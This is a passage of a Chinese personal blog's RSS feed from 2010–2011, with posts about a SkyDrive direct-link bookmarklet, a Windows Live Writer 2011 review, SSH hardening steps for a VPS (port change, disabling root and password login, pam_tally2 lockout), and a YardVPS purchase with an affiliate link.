<p>非常不错的插件，会自动通过浏览器辨识是否用手机等设备而不是PC浏览本站。</p>
<p>还有就是二维码，通过扫描软件轻松访问：</p>
</p>
<p><img src="http://loneblog.com/blog/wp-content/uploads/2011/03/api.jpg" /></p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/wordpress-mobile-pack.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SkyDrive永久外链方法（不完美）</title>
		<link>http://loneblog.com/blog/skydrive-link-out.html</link>
		<comments>http://loneblog.com/blog/skydrive-link-out.html#comments</comments>
		<pubDate>Mon, 17 Jan 2011 13:18:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[skydrive]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/skydrive-link-out.html</guid>
		<description><![CDATA[SkyDrive的外链一直有问题，冷博客深受其害，下面介绍一种不能显示文件名的方法，希望能是永久链接~

新建一个收藏夹（书签），名字随意，网址请复制一下内容（保持在一行，否则无效）
  

javascript:var%20n=document.title.replace(&#8217;%20-%20Windows%20Live&#8217;,&#8221;);var%20id=((location.hash==&#8221;)?window.selfPageData.currentItemHash:location.hash).replace(&#8217;#resId/&#8217;,&#8221;);var%20u=&#8217;http://storage.live.com/items/&#8217;+id+&#8217;?'+encodeURI(n);var%20p=&#8217;http://&#8217;+document.location.host+&#8217;/redir.aspx?page=self&#38;resId=&#8217;+id;var%20e=&#8217;&#60;input%20onmouseover=%22this.select();%22%20onclick=%22this.select();%22%20value=%22&#8242;;var%20f=&#8217;%22%20style=%22width:580px%22%20type=%22text%22%20/&#62;&#60;br&#62;&#8217;;var%20d=&#8217;%20(&#60;a%20href=%22http://loneblog%2Ecom/%22&#62;loneblog%2Ecom&#60;/a&#62;)&#8217;;var%20c=&#8217;\u5916\u94FE\u5730\u5740:&#8217;+d+e+u+f+&#8217;\u5206\u4EAB\u5730\u5740:&#8217;+e+p+f;var%20a=document.getElementById(&#8217;content&#8217;);var%20g=(a.getElementsByTagName(&#8217;p')[0]);var%20b=g?g:document.createElement(&#8217;P');b.innerHTML=c;a.insertBefore(b,a.firstChild);void(0)

在skydrive的文件页面，点击这个收藏（书签），或者在地址栏里输入上面的天书，就能得到该文件的永久链接地址。

这个方法冷博客在ie chrome和 ff中都试验通过了，不过还有个大问题，就是文件名总是乱码
不仅文件名，而且后缀也无法显示…
只能是现阶段凑活用，以后在等高人吧，这个也不是我原创的，从采集站找到的，把广告换成俺的了  
]]></description>
			<content:encoded><![CDATA[<p>SkyDrive的外链一直有问题，冷博客深受其害，下面介绍一种不能显示文件名的方法，希望能是永久链接~</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/01/image2.png" class="highslide-image" onclick="return hs.expand(this);"><img style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2011/01/image_thumb2.png" width="240" height="139" /></a></p>
<p>新建一个收藏夹（书签），名字随意，网址请复制一下内容（保持在一行，否则无效）</p>
<p>  <span id="more-1408"></span><br />
<blockquote>
<p>javascript:var%20n=document.title.replace(&#8217;%20-%20Windows%20Live&#8217;,&#8221;);var%20id=((location.hash==&#8221;)?window.selfPageData.currentItemHash:location.hash).replace(&#8217;#resId/&#8217;,&#8221;);var%20u=&#8217;http://storage.live.com/items/&#8217;+id+&#8217;?'+encodeURI(n);var%20p=&#8217;http://&#8217;+document.location.host+&#8217;/redir.aspx?page=self&amp;resId=&#8217;+id;var%20e=&#8217;&lt;input%20onmouseover=%22this.select();%22%20onclick=%22this.select();%22%20value=%22&#8242;;var%20f=&#8217;%22%20style=%22width:580px%22%20type=%22text%22%20/&gt;&lt;br&gt;&#8217;;var%20d=&#8217;%20(&lt;a%20href=%22http://loneblog%2Ecom/%22&gt;loneblog%2Ecom&lt;/a&gt;)&#8217;;var%20c=&#8217;\u5916\u94FE\u5730\u5740:&#8217;+d+e+u+f+&#8217;\u5206\u4EAB\u5730\u5740:&#8217;+e+p+f;var%20a=document.getElementById(&#8217;content&#8217;);var%20g=(a.getElementsByTagName(&#8217;p')[0]);var%20b=g?g:document.createElement(&#8217;P');b.innerHTML=c;a.insertBefore(b,a.firstChild);void(0)</p>
</blockquote>
<p>在<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/skydrive" title="查看 skydrive 的全部文章" target="_blank">skydrive</a></span>的文件页面，点击这个收藏（书签），或者在地址栏里输入上面的天书，就能得到该文件的永久链接地址。</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/01/image3.png" class="highslide-image" onclick="return hs.expand(this);"><img style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2011/01/image_thumb3.png" width="300" height="148" /></a></p>
<p>这个方法冷博客在ie chrome和 ff中都试验通过了，不过还有个大问题，就是文件名总是乱码</p>
<p>不仅文件名，而且后缀也无法显示…</p>
<p>只能是现阶段凑活用，以后在等高人吧，这个也不是我原创的，从采集站找到的，把广告换成俺的了 <img src='http://loneblog.com/blog/wp-includes/images/smilies/icon_px_11.gif' alt=':pxxiao:' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/skydrive-link-out.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Windows Live Writer 2011</title>
		<link>http://loneblog.com/blog/windows-live-writer-2011.html</link>
		<comments>http://loneblog.com/blog/windows-live-writer-2011.html#comments</comments>
		<pubDate>Wed, 05 Jan 2011 13:48:49 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[2011]]></category>
		<category><![CDATA[windows live writer]]></category>
		<category><![CDATA[WLW]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/windows-live-writer-2011.html</guid>
		<description><![CDATA[WLW2011 正式更新了，这次更新主要是和office系列软件靠拢，上面巨大的功能区是office2007（如果我没记错的话）以后特有的标志。让冷博客简单评测一下，作为一款wordpress离线编辑器，WLW2011是否能带给我们惊喜呢。
先上个截图：

  
一、外观
继承和发扬了office的特点——碍眼，都知道显示器由正方向宽屏长方发展，原来挺好的侧边栏为啥又整到上面去了。巨大的功能区，大而无用，冷博客写个博文不能总改字体和样式吧。
二、功能
功能有很大的变化，尤其是对插入内容可编辑性大大提高，对图片可以实现和office中一样的编辑、滤镜甚至是水印功能，不过还是比较简单的一些功能。
插件功能依然不给力，没有几个关于wp的插件…
三、撰写
通过选项来看和上一版本差不多，没有很大的改善，而且对wp而言修改文章数据域的时候更麻烦。
不过可以插入更多的媒体，比如和bing地图链接的“地图”，表情图释，日志标签等插入项，还可以插入表格。
联机相册的功能非常给力。不过貌似只支持Live的相册
这个插入一个地图测试：地坛公园

四、日志账户
多了这么一栏，可以直接进入wp主页、评论页等，还是方便了一些。
]]></description>
			<content:encoded><![CDATA[<p>WLW2011 正式更新了，这次更新主要是和office系列软件靠拢，上面巨大的功能区是office2007（如果我没记错的话）以后特有的标志。让冷博客简单评测一下，作为一款<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/wordpress" title="查看 wordpress 的全部文章" target="_blank">wordpress</a></span>离线编辑器，WLW2011是否能带给我们惊喜呢。</p>
<p>先上个截图：</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2011/01/image.png" class="highslide-image" onclick="return hs.expand(this);"><img style="border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2011/01/image_thumb.png" width="240" height="141" /></a></p>
<p>  <span id="more-1387"></span>
<p>一、外观</p>
<p>继承和发扬了office的特点——碍眼，都知道显示器由正方向宽屏长方发展，原来挺好的侧边栏为啥又整到上面去了。巨大的功能区，大而无用，冷博客写个博文不能总改字体和样式吧。</p>
<p>二、功能</p>
<p>功能有很大的变化，尤其是对插入内容可编辑性大大提高，对图片可以实现和office中一样的编辑、滤镜甚至是水印功能，不过还是比较简单的一些功能。</p>
<p>插件功能依然不给力，没有几个关于wp的插件…</p>
<p>三、撰写</p>
<p>通过选项来看和上一版本差不多，没有很大的改善，而且对wp而言修改文章数据域的时候更麻烦。</p>
<p>不过可以插入更多的媒体，比如和bing地图链接的“地图”，表情图释，日志标签等插入项，还可以插入表格。</p>
<p>联机相册的功能非常给力。不过貌似只支持Live的相册<img style="border-bottom-style: none; border-right-style: none; border-top-style: none; border-left-style: none" class="wlEmoticon wlEmoticon-shifty" alt="狡猾" src="http://loneblog.com/blog/wp-content/uploads/2011/01/wlEmoticon-shifty.png" /></p>
<p>这个插入一个地图测试：地坛公园</p>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:84E294D0-71C9-4bd0-A0FE-95764E0368D9:4e2064ad-a17f-4657-8c14-7d86429f9455" class="wlWriterEditableSmartContent"><a href="http://www.bing.com/maps/default.aspx?v=2&amp;cp=39.95385~116.4149&amp;lvl=16&amp;style=r&amp;mkt=en-us&amp;FORM=LLWR" id="map-ce20c45e-1fd9-4176-bdb2-4641712cd298" alt="查看地图" title="查看地图"><img src="http://loneblog.com/blog/wp-content/uploads/2011/01/map-9d6e4e5b33cb.jpg" width="320" height="240" alt="地图图片"/></a></div>
<p>四、日志账户</p>
<p>多了这么一栏，可以直接进入wp主页、评论页等，还是方便了一些。</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/windows-live-writer-2011.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>关于VPS ~SSH主机安全配置的讨论</title>
		<link>http://loneblog.com/blog/enhance-sshs-security.html</link>
		<comments>http://loneblog.com/blog/enhance-sshs-security.html#comments</comments>
		<pubDate>Wed, 29 Dec 2010 02:55:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[centos]]></category>
		<category><![CDATA[redhat]]></category>
		<category><![CDATA[ssh]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[yardvps]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/enhance-sshs-security.html</guid>
		<description><![CDATA[公网服务器总要被人扫来扫去，虽然没有被入侵，但是俗话说的好“不怕贼偷，就怕贼惦记”，所以今天来说一下VPS下SSH的安全配置。
这是昨天的logwatch
&#160;
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; pam_unix Begin &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;       sshd:      &#160;&#160;&#160; Authentication Failures:      &#160;&#160;&#160;&#160;&#160;&#160; unknown (lrouen-151-71-15-207.w80-11.abo.wanadoo.fr): 19 Time(s)      &#160;&#160;&#160; Invalid Users:      &#160;&#160;&#160;&#160;&#160;&#160; Unknown Account: 19 Time(s)       vsftpd:  [...]]]></description>
			<content:encoded><![CDATA[<p>公网服务器总要被人扫来扫去，虽然没有被入侵，但是俗话说的好“不怕贼偷，就怕贼惦记”，所以今天来说一下VPS下SSH的安全配置。</p>
<p>这是昨天的logwatch</p>
<p>&#160;</p>
<blockquote><p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; pam_unix Begin &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;      <br /> sshd:      <br />&#160;&#160;&#160; Authentication Failures:      <br />&#160;&#160;&#160;&#160;&#160;&#160; unknown (lrouen-151-71-15-207.w80-11.abo.wanadoo.fr): 19 Time(s)      <br />&#160;&#160;&#160; Invalid Users:      <br />&#160;&#160;&#160;&#160;&#160;&#160; Unknown Account: 19 Time(s)      <br /> vsftpd:      <br />&#160;&#160;&#160; Unknown Entries:      <br />&#160;&#160;&#160;&#160;&#160;&#160; authentication failure; logname= uid=0 euid=0 tty=ftp ruser=anonymous rhost=* : 3 Time(s)      <br />&#160;&#160;&#160;&#160;&#160;&#160; check pass; user unknown: 3 Time(s)      <br /> &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- pam_unix End &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
</blockquote>
<p> <span id="more-1364"></span><br />
<blockquote>
<p>&#160;</p>
<p>&#160;</p>
<p> &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; SSHD Begin &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;      <br /> Illegal users from:      <br />&#160;&#160;&#160; 80.11.161.207 (LRouen-151-71-15-207.w80-11.abo.wanadoo.fr): 19 times      <br />&#8230;</p>
<p> Received disconnect:     <br />&#160;&#160;&#160; 11: Bye Bye : 12 Time(s)      <br /> &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- SSHD End &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- </p>
</blockquote>
<p>这样搞不知道那天就攻破了~所以提高安全很是必要~</p>
<p><font color="#ff0000"><strong>注意：只有SSH管理主机的童鞋们注意了，千万不能玩脱了，把自己屏蔽了就糗了！！</strong></font></p>
<p><font color="#ff0000"><strong>先在本地/虚拟机做实验！</strong></font></p>
<h3>一.修改sshd服务器的配置文件/etc/<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/ssh" title="查看 ssh 的全部文章" target="_blank">ssh</a></span>/sshd_config，将部分参数参照如下修改，增强安全性。 </h3>
<p>&#160;</p>
<p>1.改端口</p>
<p>Port 2123</p>
<p>系统缺省使用22号端口，将监听端口更改为其他数值（最好是1024以上的高端口，以免和其他常规服务端口冲突），这样可以增加入侵者探测系统是否运行了 sshd守护进程的难度。</p>
<p>冷博客只采取了这条试验一下，下面的都是计划方案。</p>
<p>&#160;</p>
<p>2.禁止root登陆</p>
<p>PermitRootLogin no</p>
<p>阻止了root我们如何对系统进行调整呢？新建一个账号，然后赋予它sudo的权限，并且要用复杂密码和用户名。</p>
<p>useradd 27&#215;88.0op7xu;passwd 27&#215;88.0op7xu</p>
<p>echo &#8216;27&#215;88.0op7xu ALL=(ALL) ALL&#8217; &gt;&gt; /etc/sudoers 或者</p>
<p>vim /etc/sudoers 添加一行：</p>
<p>27&#215;88.0op7xu&#160;&#160;&#160; ALL=(ALL)&#160;&#160;&#160;&#160;&#160;&#160; ALL</p>
<p>这样就安全多了</p>
<p>&#160;</p>
<p>3.关闭密码登陆</p>
<p>PasswordAuthentication no</p>
<p>禁止通过密码SSH登陆，我们通过<span class='wp_keywordlink_affiliate'><a href="http://loneblog.com/blog/tag/ssh" title="查看 ssh 的全部文章" target="_blank">ssh</a></span> 密钥匹配来登录系统，具体方法网上很多，这里不多说</p>
<p>&#160;</p>
<h3>二.设置tcp wrappers。通过hosts.allow和hosts.deny限定用户访问。</h3>
<p>&#160;</p>
<p>由于冷博客没有固定IP，没有采用</p>
<p>将那些明确允许的请求添加到/etc/hosts.allow中。如系统仅允许IP地址为192.168.0.15和10.0.0.11的主机使用 sshd服务，则添加如下内容： </p>
<p>sshd:192.168.0.15 10.0.0.11</p>
<p>后面还有很多行，该添的要添，否则该通的不同。</p>
<p>&#160;</p>
<h3>三.禁用ping功能</h3>
<p>&#160;</p>
<p>其实这个功能也非常好，之所以放在第三条是因为，一些如监控网站的服务可能通过Ping来检测网站健康度，如“监控宝”，而且你自己网站挂了，很多人第一时间想到的是ping一下域名。关了以后很不方便，不过确实要安全一些，相对于web站点，这个就无所谓了，禁Ping是为了隐藏这个地址么~</p>
<p>echo 1 &gt; /proc/sys/net/ipv4/icmp_echo_ignore_all</p>
<p>或者</p>
<p>ipatbles -A INPUT -s 0/0 -p icmp -j DROP</p>
<p>&#160;</p>
<h3>四.关闭无用服务</h3>
<p>这个也是因人而异，比如我开了ftp，不用时我关了，等用的时候我在开，挺麻烦的。</p>
<p>&#160;</p>
<h3>五.在RHEL4上设置ssh策略，重试N次后锁定帐号一定时间</h3>
<p>&#160;</p>
<p>来源:<a title="http://www.soliddb.org/2010/09/14/259/" href="http://www.soliddb.org/2010/09/14/259/">http://www.soliddb.org/2010/09/14/259/</a></p>
<p>注意： 此策略只在RHEL4上可以使用，RHEL5的pam_tally.so 与RHEL4有一定的区别</p>
<p>修改 /etc/pam.d/sshd,修改后内容为，   <br />#%PAM-1.0    <br />auth&#160;&#160;&#160;&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_stack.so service=system-auth    <br />#新增下面这行，指明普通用户6次密码错误后，禁止登录60秒； root用户禁止登录120秒。    <br />auth&#160;&#160;&#160;&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_tally2.so onerr=fail deny=6 unlock_time=60    <br />even_deny_root root_unlock_time=120    <br />auth&#160;&#160;&#160;&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_nologin.so</p>
<p>account&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_stack.so service=system-auth   <br />#新增下面这行，指明account使用 pam_tally2.so    <br />account&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_tally2.so</p>
<p>password&#160;&#160; required&#160;&#160;&#160;&#160; pam_stack.so service=system-auth</p>
<p>session&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_stack.so service=system-auth   <br />session&#160;&#160;&#160; required&#160;&#160;&#160;&#160; pam_loginuid.so</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/enhance-sshs-security.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>入手YardVPS 15美刀年付VPS</title>
		<link>http://loneblog.com/blog/yardvps-15-dollar.html</link>
		<comments>http://loneblog.com/blog/yardvps-15-dollar.html#comments</comments>
		<pubDate>Sat, 25 Dec 2010 14:01:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[博客与建站]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[yardvps]]></category>

		<guid isPermaLink="false">http://loneblog.com/blog/yardvps-15-dollar.html</guid>
		<description><![CDATA[ 
一直想搞个VPS玩一玩，看了看免费的都太操蛋，还不够折腾的呢，干脆买个便宜的美国VPS试试。相比之下YardVPS性价比还是挺高的，具体以后怎么样还要看运气，毕竟只有100人民币一年，一分钱一分货嘛。
使用了几天，感觉速度是一流的，北京网通冷博客本地测试下载是满速滴~
建议虚拟空间的站长（像冷博客这样的）都可以速速转到这类小型VPS来。像冷博客这个博客使用虚拟空间，每个月要1个美元，如果换成VPS，每年仅仅多了3个美元。
不仅访问速度快了，还可以玩玩别的server，最重要的是支持支付宝付款，这对我们这些没有境外信用卡的站长真是大大的喜讯，而且没有手续费，按当日汇率，差不多100人民币左右~
★下面是冷博客的推荐链接，点击进入官网注册~
http://www.yardvps.com/billing/aff.php?aff=239
 
&#160;
进入之后，点击OpenVZ，看到第一列的LEAF 1 就是冷博客今天要推荐的，详细信息如下：
 
不过要提醒大家一点，这款比较热门，经常提示“暂时缺货”
站长超级ping：
最快：10. [福建电信] 字节=32 状态=Success 时间=187毫秒 TTL=53   最慢：3. [河南网通] 字节=32 状态=Success 时间=261毫秒 TTL=55
这里要说一下在晚高峰站长ping的延迟也会增大~
然后冷博客注册了两个免费玉米，挂了一个图床，你们可以去看看和免费使用~
tuchuang.tk
 
后几篇文章都是关于如何在新VPS中 纯手工安装至少以下内容：
LAMP（以后会换成LNMP）
DNS
vsFTP
Sendmail
SNMP
Squid
&#8230;
]]></description>
			<content:encoded><![CDATA[<p><a href="http://loneblog.com/blog/wp-content/uploads/2010/12/YardVPS_Logo.jpg" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="YardVPS_Logo" border="0" alt="YardVPS_Logo" src="http://loneblog.com/blog/wp-content/uploads/2010/12/YardVPS_Logo_thumb.jpg" width="260" height="112" /></a> </p>
<p>一直想搞个VPS玩一玩，看了看免费的都太操蛋，还不够折腾的呢，干脆买个便宜的美国VPS试试。相比之下YardVPS性价比还是挺高的，具体以后怎么样还要看运气，毕竟只有100人民币一年，一分钱一分货嘛。</p>
<p>使用了几天，感觉速度是一流的，北京网通冷博客本地测试下载是满速滴~</p>
<p>建议虚拟空间的站长（像冷博客这样的）都可以速速转到这类小型VPS来。像冷博客这个博客使用虚拟空间，每个月要1个美元，如果换成VPS，每年仅仅多了3个美元。</p>
<p>不仅访问速度快了，还可以玩玩别的server，最重要的是<strong>支持支付宝付款</strong>，这对我们这些没有境外信用卡的站长真是大大的喜讯，而且没有手续费，按当日汇率，差不多100人民币左右~</p>
<p>★下面是冷博客的推荐链接，点击进入官网注册~</p>
<p><a title="http://www.yardvps.com/billing/aff.php?aff=239" href="http://www.yardvps.com/billing/aff.php?aff=239">http://www.yardvps.com/billing/aff.php?aff=239</a></p>
<p> <span id="more-1362"></span>
<p>&#160;</p>
<p>进入之后，点击OpenVZ，看到第一列的LEAF 1 就是冷博客今天要推荐的，详细信息如下：</p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2010/12/image6.png" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2010/12/image_thumb6.png" width="222" height="338" /></a> </p>
<p>不过要提醒大家一点，这款比较热门，经常提示“暂时缺货”</p>
<p>站长超级ping：</p>
<p>最快：10. [福建电信] 字节=32 状态=Success 时间=187毫秒 TTL=53   <br />最慢：3. [河南网通] 字节=32 状态=Success 时间=261毫秒 TTL=55</p>
<p>这里要说一下在晚高峰站长ping的延迟也会增大~</p>
<p>然后冷博客注册了两个免费玉米，挂了一个图床，你们可以去看看和免费使用~</p>
<p><a href="http://tuchuang.tk" target="_blank">tuchuang.tk</a></p>
<p><a href="http://loneblog.com/blog/wp-content/uploads/2010/12/image7.png" class="highslide-image" onclick="return hs.expand(this);"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" border="0" alt="image" src="http://loneblog.com/blog/wp-content/uploads/2010/12/image_thumb7.png" width="342" height="67" /></a> </p>
<p>后几篇文章都是关于如何在新VPS中 纯手工安装至少以下内容：</p>
<p>LAMP（以后会换成LNMP）</p>
<p>DNS</p>
<p>vsFTP</p>
<p>Sendmail</p>
<p>SNMP</p>
<p>Squid</p>
<p>&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://loneblog.com/blog/yardvps-15-dollar.html/feed</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
	</channel>
</rss>

